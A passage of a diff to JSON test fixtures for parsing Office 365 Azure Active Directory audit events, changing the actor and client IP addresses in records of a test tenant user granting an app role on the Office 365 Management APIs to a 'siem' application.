APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -7688,9 +7688,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:05", "ExtendedProperties": [ { @@ -7924,7 +7924,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -7954,9 +7954,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:05", "ExtendedProperties": [ { @@ -8190,7 +8190,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 